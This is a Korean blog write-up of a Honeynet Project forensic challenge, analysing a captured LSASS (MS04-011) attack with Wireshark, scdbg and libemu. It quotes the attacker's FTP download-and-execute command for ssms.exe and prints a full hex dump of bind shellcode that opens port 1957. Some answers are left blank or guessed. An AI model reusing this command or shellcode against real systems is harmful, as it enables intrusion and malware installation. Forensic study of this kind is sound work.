예전부터 한번 풀어봐야지 하고 생각했던걸 이제서야 풀어보려고 한다. 영어의 압박이 있긴 하지만.......
URL : http://www.honeynet.org/node/504
1. Which systems (i.e. IP addresses) are involved? (2pts)
1번 문제는 간단하게 어떤 시스템이 관여되어 있는지 확인하는 문제이다.
Wireshark를 통해 Conversations 기능을 이용하여 확인하면 쉽게 확인할 수 있다.
대충 몇몇 패킷을 확인하니 공격자는 98.114.205.102 시스템이며 공격 받는쪽은 192.150.11.111 시스템이다.
2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
공격자의 위치를 묻는 문제이다.
공격자는 98.114.205.102 IP의 시스템이였으므로 아래 사이트에서 확인해 보자.
http://www.robtex.com/ip/98.114.205.102.html#whois
3. How many TCP sessions are contained in the dump file? (2pts)
TCP 패킷 갯수를 묻는 문제이다. Wireshark 에서 "TCP" 로 필터를 걸어 확인하면 348개의 패킷을 확인할 수 있다.
4. How long did it take to perform the attack? (2pts)
공격이 얼마동안 진행되었는지를 묻는 문제로 보이며 역시 Wireshark 의 마지막 패킷을 보면 시간을 확인할 수 있다.
16.219218
5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
우선 Wireshark에서 패킷에서 #14를 보면 Windows 2000 인지 확인하는 부분이 있다.
따라서 타켓 OS는 Windows 2000 이다.
그리고 취약점을 살펴보면 패킷 중 DsRoleUpgradeDownlevelServer request 라는 부분이 있다.
구글에서 "DsRoleUpgradeDownlevelServer" 로 검색을 해보면 아래와 같은 취약점을 확인할 수 있다.
Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow (CVE-2003-0533, MS04-011)
http://www.exploit-db.com/exploits/16368/
6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
공격에 대한 대략적인 스케치를 해보라는 문제 같은데 패킷을 분석해보면 공격 방법은 아래와 같다.
1) Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow 취약점을 이용하여 쉘코드 실행.
2) 쉘코드 실행 후 아래 명령어 수행. (해당 명령어는 Wireshark에서 #42 번째에서 확인할 수 있다.)
echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe
3) 위 명령어를 통해 ssms.exe 실행 후 악성코드 감염.
7. What specific vulnerability was attacked? (2pts)
Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
쉘코드를 분석하라는 문제로 보인다.
Wireshark에서 #29번째 패킷을 보면 NOP(0x90) 코드가 존재하는 것으로 보아 해당 부분이 쉘코드로 보인다.
아래 코드만 따로 떼어 저장 후 libemu(http://libemu.mwcollect.org)를 수정하여 만든 scdbg(http://sandsprite.com/blogs/index.php?uid=7&pid=152)를 이용하여 분석을 해보자.
Offset 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00000016 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00000032 EB 10 5A 4A 33 C9 66 B9 7D 01 80 34 0A 99 E2 FA ?ZJ3?? 4 쇺?
00000048 EB 05 E8 EB FF FF FF 70 95 98 99 99 C3 FD 38 A9 ?堯p븯솛츳8?
00000064 99 99 99 12 D9 95 12 E9 85 34 12 D9 91 12 41 12 솛?? ?4 ? A
00000080 EA A5 12 ED 87 E1 9A 6A 12 E7 B9 9A 62 12 D7 8D 蔚 ??j 濚쉇 ?
00000096 AA 74 CF CE C8 12 A6 9A 62 12 6B F3 97 C0 6A 3F 챫鷗?쬃b k?픧?
00000112 ED 91 C0 C6 1A 5E 9D DC 7B 70 C0 C6 C7 12 54 12 ?읗 ^ ?p읗?T
00000128 DF BD 9A 5A 48 78 9A 58 AA 50 FF 12 91 12 DF 85 颯쉅Hx쉃챀 ??
00000144 9A 5A 58 78 9B 9A 58 12 99 9A 5A 12 63 12 6E 1A 쉅Xx썧X 솞Z c n
00000160 5F 97 12 49 F3 9A C0 71 1E 99 99 99 1A 5F 94 CB _?I?픮 솛?_붘
00000176 CF 66 CE 65 C3 12 41 F3 9C C0 71 ED 99 99 99 C9 ???A?픮?솛?
00000192 C9 C9 C9 F3 98 F3 9B 66 CE 75 12 41 5E 9E 9B 99 섘쌸? A^옕?
00000208 9E 3C AA 59 10 DE 9D F3 89 CE CA 66 CE 69 F3 98 ?챍 ??狂f??
00000224 CA 66 CE 6D C9 C9 CA 66 CE 61 12 49 1A 75 DD 12 ???? I u?
00000240 6D AA 59 F3 89 C0 10 9D 17 7B 62 10 CF A1 10 CF m챍?? {b 區 ?
00000256 A5 10 CF D9 FF 5E DF B5 98 98 14 DE 89 C9 CF AA ?裙^森삓 ??
00000272 50 C8 C8 C8 F3 98 C8 C8 5E DE A5 FA F4 FD 99 14 P훑흴샠?裨浹?
00000288 DE A5 C9 C8 66 CE 79 CB 66 CE 65 CA 66 CE 65 C9 裨f??????
00000304 66 CE 7D AA 59 35 1C 59 EC 60 C8 CB CF CA 66 4B f?챍5 Y?훙銶fK
00000320 C3 C0 32 7B 77 AA 59 5A 71 76 67 66 66 DE FC ED 쳄2{w챍Zqvgff數?
00000336 C9 EB F6 FA D8 FD FD EB FC EA EA 99 DA EB FC F8 濁麵凞獪?潘孝
00000352 ED FC C9 EB F6 FA FC EA EA D8 99 DC E1 F0 ED CD 贓濁獪葦쇴鎖雀
00000368 F1 EB FC F8 FD 99 D5 F6 F8 FD D5 F0 FB EB F8 EB 衆孝?歷飄驢魂幅
00000384 E0 D8 99 EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA 鮮숊原튠쳶狂襪濁
00000400 F2 FC ED D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 潗簪숞棕?春悠嚆
00000416 99 F8 FA FA FC E9 ED 99 FA F5 F6 EA FC EA F6 FA 숚頰灰?狹朶獪濁
00000432 F2 FC ED 99 90 90 90 90 90 90 90 90 90 90 90 90 潗?
00000448 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00000464 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
scdbg를 통해 확인한 화면
C:\Users\ByJJoon\Downloads\scdbg>scdbg.exe -f bin
Loaded 1e0 bytes from file bin
Initilization Complete..
Max Steps: 1000000
Using base offset: 0x401000
401140 GetProcAddress(CreateProcessA)
401140 GetProcAddress(ExitThread)
401140 GetProcAddress(LoadLibraryA)
4010b4 LoadLibraryA(ws2_32)
401140 GetProcAddress(WSASocketA)
401140 GetProcAddress(bind)
401140 GetProcAddress(listen)
401140 GetProcAddress(accept)
401140 GetProcAddress(closesocket)
4010ca WSASocket(2, 1, 0)
4010de bind(port: 1957 )
4010e4 listen(h=4711)
4010ea accept(h=4711)
401127 CreateProcessA( cmd, )
40112b closesocket(h=ffffffff)
40112f closesocket(h=4711)
401133 ExitThread(-1)
stepcount 7512
libemu를 통해 확인한 화면
[byjjoon@ByJJoon shellcode]$ /opt/libemu/bin/sctest -Ss 100000 < bin
verbose = 0
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 7c800000
procname name is 'CreateProcessA'
dll is kernel32 7c800000 7c800000
found CreateProcessA at addr 7c802367
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 7c800000
procname name is 'ExitThread'
dll is kernel32 7c800000 7c800000
found ExitThread at addr 7c80c058
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 7c800000
procname name is 'LoadLibraryA'
dll is kernel32 7c800000 7c800000
found LoadLibraryA at addr 7c801d77
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:661 env_w32_hook_LoadLibrayA
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 71a10000
procname name is 'WSASocketA'
dll is ws2_32 71a10000 71a10000
found WSASocketA at addr 71a18769
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 71a10000
procname name is 'bind'
dll is ws2_32 71a10000 71a10000
found bind at addr 71a13e00
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 71a10000
procname name is 'listen'
dll is ws2_32 71a10000 71a10000
found listen at addr 71a188d3
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 71a10000
procname name is 'accept'
dll is ws2_32 71a10000 71a10000
found accept at addr 71a21028
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:460 env_w32_hook_GetProcAddress
module ptr is 71a10000
procname name is 'closesocket'
dll is ws2_32 71a10000 71a10000
found closesocket at addr 71a19639
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:461 env_w32_hook_WSASocketA
SOCKET WSASocket(af=2, type=1, protocol=0, lpProtocolInfo=0, group=0, dwFlags=0);
socket 3
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:101 env_w32_hook_bind
bind(s=3, name=41716d, namelen=16
host 0.0.0.0 port 1957
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:231 env_w32_hook_listen
listen(s=3, backlog=1)
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:58 env_w32_hook_accept
accept(s=3, addr=0, addrlen=0);
scdbg를 통해 확인해보면 Bind 쉘코드이며 포트는 1957번을 오픈하는 것으로 보인다.
9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
음?
10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
아래 명령어를 통해 전송된 파일은 ssms.exe 파일이다.
echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe
해당 파일을 Wireshark에서 추출하여 보면 MD5값은 14a09a48ad23fe0ea5a180bee8cb750a 이다.
해당 MD5 값으로 VirusTotal 사이트에서 확인하면 아래와 같다.
http://www.virustotal.com/file-scan/report.html?id=b14ccb3786af7553f7c251623499a7fe67974dde69d3dffd65733871cddf6b6d-1299265132
11. Do you think this is a manual or an automated attack? Why? (2pts)
이 공격이 자동화 된 공격인지 혹은 수동으로 한 공격인지를 묻는 문제로 보인다.
당연히 자동화된 공격아닌가? -_-a